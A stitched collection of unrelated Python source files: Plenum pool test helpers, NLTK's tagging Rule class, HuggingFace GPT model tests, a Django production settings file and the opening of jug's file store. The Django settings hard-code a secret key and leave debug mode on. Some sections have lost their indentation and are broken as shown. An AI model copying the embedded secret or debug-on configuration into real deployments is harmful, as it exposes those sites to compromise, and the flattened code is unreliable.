    dest = hexToFriendly(node.nodestack.verhex)
    sdk_send_update_node(looper, steward_wallet,
                         sdk_pool_handle, dest, node.name,
                         None, None, None, None,
                         services=[VALIDATOR])
def disconnectPoolNode(poolNodes: Iterable,
                       disconnect: Union[str, TestNode],
                       stopNode=True):
    """
    Disconnect one node (given by name or instance) from the pool: either
    stop it completely or only close its network stacks.
    """
    if isinstance(disconnect, TestNode):
        disconnect = disconnect.name
    assert isinstance(disconnect, str)
    target = next((n for n in poolNodes if n.name == disconnect), None)
    if target is None:
        raise AssertionError('The node {} which should be disconnected '
                             'is not found in the passed pool node list {}'
                             .format(disconnect, poolNodes))
    if stopNode:
        target.stop()
    else:
        target.clientstack.close()
        target.nodestack.close()
def reconnectPoolNode(looper: Looper,
                      poolNodes: Iterable,
                      connect: Union[str, TestNode]):
    """
    Reconnect a previously disconnected node: re-open its stacks when it is
    still running, otherwise start it on the looper.
    """
    if isinstance(connect, TestNode):
        connect = connect.name
    assert isinstance(connect, str)
    target = next((n for n in poolNodes if n.name == connect), None)
    if target is None:
        raise AssertionError('The node {} which should be reconnected '
                             'is not found in the passed pool node list {}'
                             .format(connect, poolNodes))
    if target.isGoing():
        target.nodestack.open()
        target.clientstack.open()
        target.nodestack.maintainConnections(force=True)
    else:
        target.start(looper)
def disconnect_node_and_ensure_disconnected(looper: Looper,
                                            poolNodes: Iterable[TestNode],
                                            disconnect: Union[str, TestNode],
                                            timeout=None,
                                            stopNode=True):
    """
    Disconnect one node from the pool and block until all remaining nodes
    have observed the disconnection.
    """
    if isinstance(disconnect, TestNode):
        disconnect = disconnect.name
    assert isinstance(disconnect, str)
    matches = [n for n in poolNodes if n.name == disconnect]
    assert len(matches) == 1
    node_to_disconnect = matches[0]
    disconnectPoolNode(poolNodes, disconnect, stopNode=stopNode)
    ensure_node_disconnected(looper,
                             node_to_disconnect,
                             set(poolNodes) - {node_to_disconnect},
                             timeout=timeout)
def reconnect_node_and_ensure_connected(looper: Looper,
                                        poolNodes: Iterable[TestNode],
                                        connect: Union[str, TestNode],
                                        timeout=None):
    """Reconnect *connect* and wait until the whole pool is connected again."""
    name = connect.name if isinstance(connect, TestNode) else connect
    assert isinstance(name, str)
    reconnectPoolNode(looper, poolNodes, name)
    looper.run(checkNodesConnected(poolNodes, customTimeout=timeout))
def sdk_add_2_nodes(looper, txnPoolNodeSet,
                    sdk_pool_handle, sdk_wallet_steward,
                    tdir, tconf, allPluginsPath):
    """
    Grow the pool by two nodes ("Zeta" and "Eta"), each with its own fresh
    steward, waiting for connection and data equality after each addition.
    Returns the list of new nodes.
    """
    names = ("Zeta", "Eta")
    new_nodes = []
    for node_name in names:
        new_steward_name = "testClientSteward" + randomString(3)
        new_steward_wallet, new_node = \
            sdk_add_new_steward_and_node(looper,
                                         sdk_pool_handle,
                                         sdk_wallet_steward,
                                         new_steward_name,
                                         node_name,
                                         tdir,
                                         tconf,
                                         allPluginsPath)
        txnPoolNodeSet.append(new_node)
        looper.run(checkNodesConnected(txnPoolNodeSet))
        waitNodeDataEquality(looper, new_node, *txnPoolNodeSet[:-1],
                             exclude_from_check=['check_last_ordered_3pc_backup'])
        sdk_pool_refresh(looper, sdk_pool_handle)
        new_nodes.append(new_node)
    return new_nodes
def sdk_add_new_nym_without_waiting(looper, sdk_pool_handle, creators_wallet,
                                    alias=None, role=None, seed=None,
                                    dest=None, verkey=None, skipverkey=False):
    """
    Send a NYM request without waiting for replies.

    Previously duplicated the body of sdk_add_new_nym; now a thin wrapper
    around sdk_add_new_nym(no_wait=True).  Returns the in-flight request
    couple (callers that ignored the former implicit None are unaffected).
    """
    return sdk_add_new_nym(looper, sdk_pool_handle, creators_wallet,
                           alias=alias, role=role, seed=seed,
                           dest=dest, verkey=verkey, skipverkey=skipverkey,
                           no_wait=True)
| |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Transformation-based learning
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Marcus Uneson <marcus.uneson@gmail.com>
# based on previous (nltk2) version by
# Christopher Maloof, Edward Loper, Steven Bird
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from nltk.compat import python_2_unicode_compatible, unicode_repr
from nltk import jsontags
######################################################################
# Tag Rules
######################################################################
@add_metaclass(ABCMeta)
class TagRule(object):
    """
    An interface for tag transformations on a tagged corpus, as
    performed by tbl taggers. Each transformation finds all tokens
    in the corpus that are tagged with a specific original tag and
    satisfy a specific condition, and replaces their tags with a
    replacement tag. For any given transformation, the original
    tag, replacement tag, and condition are fixed. Conditions may
    depend on the token under consideration, as well as any other
    tokens in the corpus.

    Tag rules must be comparable and hashable.
    """

    def __init__(self, original_tag, replacement_tag):
        self.original_tag = original_tag
        """The tag which this TagRule may cause to be replaced."""

        self.replacement_tag = replacement_tag
        """The tag with which this TagRule may replace another tag."""

    def apply(self, tokens, positions=None):
        """
        Apply this rule at every position in positions where it
        applies to the given sentence. I.e., for each position p
        in *positions*, if *tokens[p]* is tagged with this rule's
        original tag, and satisfies this rule's condition, then set
        its tag to be this rule's replacement tag.

        :param tokens: The tagged sentence
        :type tokens: list(tuple(str, str))
        :type positions: list(int)
        :param positions: The positions where the transformation is to
            be tried. If not specified, try it at all positions.
        :return: The indices of tokens whose tags were changed by this
            rule.
        :rtype: list(int)
        """
        if positions is None:
            positions = list(range(len(tokens)))

        # Determine the indices at which this rule applies.
        change = [i for i in positions if self.applies(tokens, i)]

        # Make the changes.  Note: this must be done in a separate
        # step from finding applicable locations, since we don't want
        # the rule to interact with itself.
        for i in change:
            tokens[i] = (tokens[i][0], self.replacement_tag)

        return change

    @abstractmethod
    def applies(self, tokens, index):
        """
        :return: True if the rule would change the tag of
            ``tokens[index]``, False otherwise
        :rtype: bool
        :param tokens: A tagged sentence
        :type tokens: list(str)
        :param index: The index to check
        :type index: int
        """

    # Rules must be comparable and hashable for the algorithm to work
    def __eq__(self, other):
        raise TypeError("Rules must implement __eq__()")

    def __ne__(self, other):
        raise TypeError("Rules must implement __ne__()")

    def __hash__(self):
        raise TypeError("Rules must implement __hash__()")
@python_2_unicode_compatible
@jsontags.register_tag
class Rule(TagRule):
    """
    A Rule checks the current corpus position for a certain set of conditions;
    if they are all fulfilled, the Rule is triggered, meaning that it
    will change tag A to tag B. For other tags than A, nothing happens.

    The conditions are parameters to the Rule instance. Each condition is a
    feature-value pair, with a set of positions to check for the value of the
    corresponding feature.

    Conceptually, the positions are joined by logical OR, and the feature set
    by logical AND.

    More formally, the Rule is then applicable to the M{n}th token iff:

      - The M{n}th token is tagged with the Rule's original tag; and
      - For each (Feature(positions), M{value}) tuple:
        - The value of Feature of at least one token in {n+p for p in positions}
          is M{value}.
    """

    json_tag = 'nltk.tbl.Rule'

    def __init__(self, templateid, original_tag, replacement_tag, conditions):
        """
        Construct a new Rule that changes a token's tag from
        C{original_tag} to C{replacement_tag} if all of the properties
        specified in C{conditions} hold.

        @type templateid: string
        @param templateid: the template id (a zero-padded string, '001' etc,
            so it will sort nicely)
        @type conditions: C{iterable} of C{Feature}
        @param conditions: A list of Feature(positions),
            each of which specifies that the property (computed by
            Feature.extract_property()) of at least one
            token in M{n} + p in positions is C{value}.
        """
        TagRule.__init__(self, original_tag, replacement_tag)
        self._conditions = conditions
        self.templateid = templateid

    def encode_json_obj(self):
        # Serialization hook used by nltk.jsontags.
        return {
            'templateid': self.templateid,
            'original': self.original_tag,
            'replacement': self.replacement_tag,
            'conditions': self._conditions,
            }

    @classmethod
    def decode_json_obj(cls, obj):
        # Deserialization hook used by nltk.jsontags.
        return cls(obj['templateid'], obj['original'], obj['replacement'], obj['conditions'])

    def applies(self, tokens, index):
        # Inherit docs from TagRule

        # Does the given token have this Rule's "original tag"?
        if tokens[index][1] != self.original_tag:
            return False

        # Check to make sure that every condition holds.
        for (feature, val) in self._conditions:

            # Look for *any* token that satisfies the condition.
            for pos in feature.positions:
                if not (0 <= index + pos < len(tokens)):
                    continue
                if feature.extract_property(tokens, index+pos) == val:
                    break
            else:
                # No token satisfied the condition; return false.
                return False

        # Every condition checked out, so the Rule is applicable.
        return True

    def __eq__(self, other):
        return (self is other or
                (other is not None and
                 other.__class__ == self.__class__ and
                 self.original_tag == other.original_tag and
                 self.replacement_tag == other.replacement_tag and
                 self._conditions == other._conditions))

    def __ne__(self, other):
        return not (self == other)

    def __hash__(self):

        # Cache our hash value (justified by profiling.)
        try:
            return self.__hash
        except AttributeError:
            self.__hash = hash(repr(self))
            return self.__hash

    def __repr__(self):
        # Cache the repr (justified by profiling -- this is used as
        # a sort key when deterministic=True.)
        try:
            return self.__repr
        except AttributeError:
            self.__repr = (
                "{0}('{1}', {2}, {3}, [{4}])".format(
                    self.__class__.__name__,
                    self.templateid,
                    unicode_repr(self.original_tag),
                    unicode_repr(self.replacement_tag),

                    # list(self._conditions) would be simpler but will not generate
                    # the same Rule.__repr__ in python 2 and 3 and thus break some tests
                    ', '.join("({0},{1})".format(f, unicode_repr(v)) for (f, v) in self._conditions)
                )
            )

            return self.__repr

    def __str__(self):
        def _condition_to_logic(feature, value):
            """
            Return a compact, predicate-logic styled string representation
            of the given condition.
            """
            return '{0}:{1}@[{2}]'.format(
                feature.PROPERTY_NAME,
                value,
                ",".join(str(w) for w in feature.positions)
            )

        conditions = ' & '.join([_condition_to_logic(f, v) for (f, v) in self._conditions])
        s = '{0}->{1} if {2}'.format(
            self.original_tag,
            self.replacement_tag,
            conditions
        )

        return s

    def format(self, fmt):
        """
        Return a string representation of this rule.

        >>> from nltk.tbl.rule import Rule
        >>> from nltk.tag.brill import Pos

        >>> r = Rule("23", "VB", "NN", [(Pos([-2,-1]), 'DT')])

        >>> r.format("str") == str(r)
        True
        >>> r.format("str")
        'VB->NN if Pos:DT@[-2,-1]'

        >>> r.format("repr") == repr(r)
        True
        >>> r.format("repr")
        "Rule('23', 'VB', 'NN', [(Pos([-2, -1]),'DT')])"

        >>> r.format("verbose")
        'VB -> NN if the Pos of words i-2...i-1 is "DT"'

        >>> r.format("not_found")
        Traceback (most recent call last):
          File "<stdin>", line 1, in <module>
          File "nltk/tbl/rule.py", line 256, in format
            raise ValueError("unknown rule format spec: {0}".format(fmt))
        ValueError: unknown rule format spec: not_found
        >>>

        :param fmt: format specification
        :type fmt: str
        :return: string representation
        :rtype: str
        """
        if fmt == "str":
            return self.__str__()
        elif fmt == "repr":
            return self.__repr__()
        elif fmt == "verbose":
            return self._verbose_format()
        else:
            raise ValueError("unknown rule format spec: {0}".format(fmt))

    def _verbose_format(self):
        """
        Return a wordy, human-readable string representation
        of the given rule.

        Not sure how useful this is.
        """
        def condition_to_str(feature, value):
            return ('the %s of %s is "%s"' %
                    (feature.PROPERTY_NAME, range_to_str(feature.positions), value))

        def range_to_str(positions):
            if len(positions) == 1:
                p = positions[0]
                if p == 0:
                    return 'this word'
                if p == -1:
                    return 'the preceding word'
                elif p == 1:
                    return 'the following word'
                elif p < 0:
                    return 'word i-%d' % -p
                elif p > 0:
                    return 'word i+%d' % p
            else:
                # for complete compatibility with the wordy format of nltk2
                mx = max(positions)
                mn = min(positions)
                if mx - mn == len(positions) - 1:
                    return 'words i%+d...i%+d' % (mn, mx)
                else:
                    return 'words {%s}' % (",".join("i%+d" % d for d in positions),)

        replacement = '%s -> %s' % (self.original_tag, self.replacement_tag)
        conditions = (' if ' if self._conditions else "") + ', and '.join(
            condition_to_str(f, v) for (f, v) in self._conditions
        )
        return replacement + conditions
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_generation_utils import GenerationTesterMixin
from .test_modeling_common import ModelTesterMixin, ids_tensor
if is_torch_available():
import torch
from transformers import (
OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST,
OpenAIGPTConfig,
OpenAIGPTDoubleHeadsModel,
OpenAIGPTForSequenceClassification,
OpenAIGPTLMHeadModel,
OpenAIGPTModel,
)
class OpenAIGPTModelTester:
    """
    Helper that builds a deliberately tiny OpenAIGPT configuration plus random
    input tensors, and runs shape/loss checks on behalf of OpenAIGPTModelTest.
    """
    def __init__(
        self,
        parent,
    ):
        # `parent` is the owning unittest.TestCase; its assertEqual is used below.
        self.parent = parent
        # Small dimensions keep the tests fast on CPU.
        self.batch_size = 13
        self.seq_length = 7
        self.is_training = True
        self.use_token_type_ids = True
        self.use_labels = True
        self.vocab_size = 99
        self.hidden_size = 32
        self.num_hidden_layers = 5
        self.num_attention_heads = 4
        self.intermediate_size = 37
        self.hidden_act = "gelu"
        self.hidden_dropout_prob = 0.1
        self.attention_probs_dropout_prob = 0.1
        self.max_position_embeddings = 512
        self.type_vocab_size = 16
        self.type_sequence_label_size = 2
        self.initializer_range = 0.02
        self.num_labels = 3
        self.num_choices = 4
        self.scope = None
        # last vocabulary id is reserved as the padding token id
        self.pad_token_id = self.vocab_size - 1

    def prepare_config_and_inputs(self):
        """Build a config plus random input/label tensors for one forward pass."""
        input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
        token_type_ids = None
        if self.use_token_type_ids:
            token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
        sequence_labels = None
        token_labels = None
        choice_labels = None
        if self.use_labels:
            sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
            token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
            choice_labels = ids_tensor([self.batch_size], self.num_choices)
        # The commented-out kwargs are not accepted by OpenAIGPTConfig; they
        # are kept here to document which tester attributes have no config
        # counterpart for this architecture.
        config = OpenAIGPTConfig(
            vocab_size=self.vocab_size,
            n_embd=self.hidden_size,
            n_layer=self.num_hidden_layers,
            n_head=self.num_attention_heads,
            # intermediate_size=self.intermediate_size,
            # hidden_act=self.hidden_act,
            # hidden_dropout_prob=self.hidden_dropout_prob,
            # attention_probs_dropout_prob=self.attention_probs_dropout_prob,
            n_positions=self.max_position_embeddings,
            n_ctx=self.max_position_embeddings,
            # type_vocab_size=self.type_vocab_size,
            # initializer_range=self.initializer_range
            pad_token_id=self.pad_token_id,
        )
        head_mask = ids_tensor([self.num_hidden_layers, self.num_attention_heads], 2)
        return (
            config,
            input_ids,
            head_mask,
            token_type_ids,
            sequence_labels,
            token_labels,
            choice_labels,
        )

    def create_and_check_openai_gpt_model(self, config, input_ids, head_mask, token_type_ids, *args):
        """Check the base model's output shape for several argument combinations."""
        model = OpenAIGPTModel(config=config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, token_type_ids=token_type_ids, head_mask=head_mask)
        result = model(input_ids, token_type_ids=token_type_ids)
        # Only the last (minimal-argument) call's result is shape-checked.
        result = model(input_ids)
        self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))

    def create_and_check_lm_head_model(self, config, input_ids, head_mask, token_type_ids, *args):
        """Check LM-head loss is scalar and logits cover the vocabulary."""
        model = OpenAIGPTLMHeadModel(config)
        model.to(torch_device)
        model.eval()
        # Using input_ids as labels gives the standard LM shift objective.
        result = model(input_ids, token_type_ids=token_type_ids, labels=input_ids)
        self.parent.assertEqual(result.loss.shape, ())
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))

    def create_and_check_double_lm_head_model(self, config, input_ids, head_mask, token_type_ids, *args):
        """Check the double-heads model's LM loss and logits shapes."""
        model = OpenAIGPTDoubleHeadsModel(config)
        model.to(torch_device)
        model.eval()
        result = model(input_ids, token_type_ids=token_type_ids, labels=input_ids)
        self.parent.assertEqual(result.loss.shape, ())
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))

    def create_and_check_openai_gpt_for_sequence_classification(
        self, config, input_ids, head_mask, token_type_ids, *args
    ):
        """Check classification logits have shape (batch, num_labels)."""
        config.num_labels = self.num_labels
        model = OpenAIGPTForSequenceClassification(config)
        model.to(torch_device)
        model.eval()
        # print(config.num_labels, sequence_labels.size())
        sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
        result = model(input_ids, token_type_ids=token_type_ids, labels=sequence_labels)
        self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))

    def prepare_config_and_inputs_for_common(self):
        """Adapt prepare_config_and_inputs() to the (config, inputs_dict) shape ModelTesterMixin expects."""
        config_and_inputs = self.prepare_config_and_inputs()
        (
            config,
            input_ids,
            head_mask,
            token_type_ids,
            sequence_labels,
            token_labels,
            choice_labels,
        ) = config_and_inputs
        inputs_dict = {
            "input_ids": input_ids,
            "token_type_ids": token_type_ids,
            "head_mask": head_mask,
        }
        return config, inputs_dict
@require_torch
class OpenAIGPTModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
    """Common model/generation test-suite entry point for the OpenAI GPT family."""

    all_model_classes = (
        (OpenAIGPTModel, OpenAIGPTLMHeadModel, OpenAIGPTDoubleHeadsModel, OpenAIGPTForSequenceClassification)
        if is_torch_available()
        else ()
    )
    all_generative_model_classes = (
        (OpenAIGPTLMHeadModel,) if is_torch_available() else ()
    )  # TODO (PVP): Add Double HeadsModel when generate() function is changed accordingly

    # special case for DoubleHeads model
    def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):
        """Extend the mixin's input preparation with DoubleHeads-specific labels."""
        inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)

        if return_labels:
            if model_class.__name__ == "OpenAIGPTDoubleHeadsModel":
                # DoubleHeads expects an extra num_choices dimension, so the
                # regular (batch, seq) inputs are replaced with zero tensors
                # of shape (batch, num_choices, seq).
                inputs_dict["labels"] = torch.zeros(
                    (self.model_tester.batch_size, self.model_tester.num_choices, self.model_tester.seq_length),
                    dtype=torch.long,
                    device=torch_device,
                )
                inputs_dict["input_ids"] = inputs_dict["labels"]
                inputs_dict["token_type_ids"] = inputs_dict["labels"]
                inputs_dict["mc_token_ids"] = torch.zeros(
                    (self.model_tester.batch_size, self.model_tester.num_choices),
                    dtype=torch.long,
                    device=torch_device,
                )
                inputs_dict["mc_labels"] = torch.zeros(
                    self.model_tester.batch_size, dtype=torch.long, device=torch_device
                )
        return inputs_dict

    def setUp(self):
        self.model_tester = OpenAIGPTModelTester(self)
        self.config_tester = ConfigTester(self, config_class=OpenAIGPTConfig, n_embd=37)

    def test_config(self):
        self.config_tester.run_common_tests()

    def test_openai_gpt_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_openai_gpt_model(*config_and_inputs)

    def test_openai_gpt_lm_head_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_lm_head_model(*config_and_inputs)

    def test_openai_gpt_double_lm_head_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_double_lm_head_model(*config_and_inputs)

    def test_openai_gpt_classification_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_openai_gpt_for_sequence_classification(*config_and_inputs)

    @slow
    def test_model_from_pretrained(self):
        # Only the first checkpoint is downloaded to keep the slow test short.
        for model_name in OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
            model = OpenAIGPTModel.from_pretrained(model_name)
            self.assertIsNotNone(model)
@require_torch
class OPENAIGPTModelLanguageGenerationTest(unittest.TestCase):
    @slow
    def test_lm_generate_openai_gpt(self):
        """Greedy generation from 'the president is' must match the reference continuation."""
        model = OpenAIGPTLMHeadModel.from_pretrained("openai-gpt")
        model.to(torch_device)
        # token ids for: the president is
        prompt = torch.tensor([[481, 4735, 544]], dtype=torch.long, device=torch_device)
        # the president is a very good man. " \n " i'm sure he is, " said the
        expected = [
            481, 4735, 544, 246, 963,
            870, 762, 239, 244, 40477,
            244, 249, 719, 881, 487,
            544, 240, 244, 603, 481,
        ]
        generated = model.generate(prompt, do_sample=False)
        self.assertListEqual(generated[0].tolist(), expected)
| |
"""
Django settings for columbus project on production server.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import socket
import mimetypes
mimetypes.add_type("image/svg+xml", ".svg", True)
mimetypes.add_type("image/svg+xml", ".svgz", True)
# Webservice for Galileo. Needed only when columbus is integrated to work with galileo.
WEBSERVICE_HOST = 'http://tomcat.columbus-sandbox.tk/galileo-web-service'
SUPERVISOR_PORT = 56789
CONTAINER_SIZE_MB = 256 # 256 MB containers for any target
USER_DIRPATH = '/mnt/ldsk/'
USER_GCSPATH = '/mnt/bdsk/'
TEMP_DIRPATH = '/mnt/tdsk/'
BQ_TABLES = 'bigquery.tables'
BQ_FEATURES = 'bigquery.features'
BQ_FEATURES_SUFFIX = '::features'
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECURED_DIR = os.path.join(BASE_DIR, 'secured')
REQUIRES_DIR = os.path.join(BASE_DIR, 'requires')
# service account credentials from Google dev console for Google Earth Engine
EE_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# service account credentials from Google dev console for Google Bigquery
BQ_CREDENTIALS = os.path.join(SECURED_DIR, 'earth-outreach-bigquery.json')
# service account credentials from Google dev console for Google Cloud Storage
CS_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# service account credentials from Google dev console for Google Fusion Tables and Google Drive
FT_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-earth-engine.json')
# client secret to gain access to end users google drive
GD_CREDENTIALS = os.path.join(SECURED_DIR, 'columbus-client-secret.json')
# WORKERS CONFIGURATION
# file having the list of worker host names one on each line
WORKERS = [socket.getfqdn()]
# default is ~/columbus. If specified path must be fully qualified
WORKER_VIRTUAL_ENV = None
WORKER_SSH_PORT = 22
WORKER_SSH_USER = 'johnsoncharles26'
# used for password based login or as passphrase for private key file
WORKER_SSH_PASSWORD = None
# fully qualified path for the priavte key file. if not specified ~/.ssh/id_rsa is tried
WORKER_SSH_PRIVATE_KEY = None
# Scheduler Configuration
# must be one of local, remote, hybrid
PIPELINE_SCHEDULING_STRATEGY = "hybrid"
# waiting-running target ratio used only for hybrid scheduling strategy.
# Default is 1, meaning targets are sent to the same worker as long as the number
# of targets waiting is less than or equal to the number of running targets of any user
HYBRID_SCHEDULING_WR_RATIO = 1
# Cloud Storage Bucket to use for temporary file storing. The service account key specified for EE_CREDENTIALS must have
# full access to this bucket.
CS_TEMP_BUCKET = 'staging.columbus-csu.appspot.com'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Change the key to something else after deployment
SECRET_KEY = '3bg_5!omle5)+60!(qndj2!#yi+d%2oug2ydo(*^nup+9if0$k'
# Remove the following debug params after successful deployment
DEBUG = True
# TEMPLATE_DEBUG = True
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'pyedf.apps.ColumbusConfig',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'pyedf.middleware.ColumbusMiddleware',
)

ROOT_URLCONF = 'columbus.urls'
# WSGI_APPLICATION = 'columbus.wsgi.application'

# Do not forget to whitelist the ip of compute engine in cloud sql
# NOTE(review): the connection values below are placeholders — they must be
# replaced with real Cloud SQL settings (ideally from the environment) at deploy time.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'database-name',
        'USER': 'user-name',
        'PASSWORD': 'password',
        'HOST': 'mysql-ip-address',
        'PORT': '3306'
    }
}

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# static file directory inclusion
# STATICFILES_DIRS = (
# os.path.join(BASE_DIR, 'static'),
# )

# list of host names to which django server should serve. Must be specified when DEBUG = False
ALLOWED_HOSTS = ['www.columbus.cs.colostate.edu']

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            BASE_DIR + '/templates/'
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
                # list if you haven't customized them:
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Application settings
LOGIN_URL = '/login/'
LOGOUT_URL = '/login/'
# LOGIN_REDIRECT_URL = '/home'

ADMINS = [
    ('Johnson Kachikaran', 'jcharles@cs.colostate.edu'),
]

# Refer to configuring sendgrid using Postfix on Google Compute Engine here
# https://cloud.google.com/compute/docs/tutorials/sending-mail/using-sendgrid
# NOTE(review): EMAIL_HOST_USER/EMAIL_HOST_PASSWORD are placeholders — supply
# real SendGrid credentials at deploy time, preferably via environment variables.
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'sendgrid-username'
EMAIL_HOST_PASSWORD = 'sendgrid-password'
EMAIL_PORT = 2525
EMAIL_USE_TLS = True
EMAIL_SUBJECT_PREFIX = '[Columbus] '
EMAIL_SENDER = 'Sender Name <senders email address including angular brackets>'

MANAGERS = (
    ('Johnson Kachikaran', 'jcharles@cs.colostate.edu'),
)
SEND_BROKEN_LINK_EMAILS = True
# Logger settings
# dev_settings.py
LOGGING = {
    'version': 1,
    # Keep loggers configured before this dict is applied (e.g. by libraries).
    'disable_existing_loggers': False,
    'formatters': {
        'verbose': {
            'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
            'datefmt': "%d/%b/%Y %H:%M:%S"
        },
        'simple': {
            'format': '%(levelname)s %(message)s'
        },
    },
    'handlers': {
        # Application log: rotates at 10MB, keeps 10 backups.
        'edffile': {
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': os.path.join(BASE_DIR, 'pyedf.log'),
            'maxBytes': 1024 * 1024 * 10,  # 10MB
            'backupCount': 10,
            'formatter': 'verbose'
        },
        # Framework log: same rotation policy, separate file.
        'djangofile': {
            'class': 'logging.handlers.RotatingFileHandler',
            'filename': os.path.join(BASE_DIR, 'django.log'),
            'maxBytes': 1024 * 1024 * 10,  # 10MB
            'backupCount': 10,
            'formatter': 'verbose'
        }
    },
    'loggers': {
        'django': {
            'handlers': ['djangofile'],
            'propagate': True,
            'level': 'ERROR',
        },
        'pyedf': {
            'handlers': ['edffile'],
            'level': 'INFO',
        },
    }
}
| |
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2017, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
file_store : file-system based data store & locks.
'''
import os
from os import path, mkdir
from os.path import dirname, exists
import errno
import tempfile
import shutil
from .base import base_store, base_lock
from jug.backends.encode import encode_to, decode_from
def create_directories(dname):
'''
create_directories(dname)
Recursively create directories.
'''
if dname.endswith('/'): dname = dname[:-1]
head, tail = path.split(dname)
if path.exists(dname): return
if head: create_directories(head)
try:
mkdir(dname)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def fsync_dir(fname):
import errno
parent = dirname(fname)
try:
fd = os.open(parent, os.O_RDONLY)
except:
# It seems that, on Windows and related platforms (cygwin...), you
# cannot open a directory to get a file descriptor, so the call above
# raises an error.
import sys
if not sys.platform.startswith('linux'):
return
else: # On Linux, we still want to check what's wrong
raise
try:
os.fsync(fd)
except OSError as err:
if err.errno != errno.EINVAL:
raise
finally:
os.close(fd)
class file_store(base_store):
    '''
    File-system based store.

    Each key is mapped to the file ``jugdir/<key[:2]>/<key[2:]>``; writes go
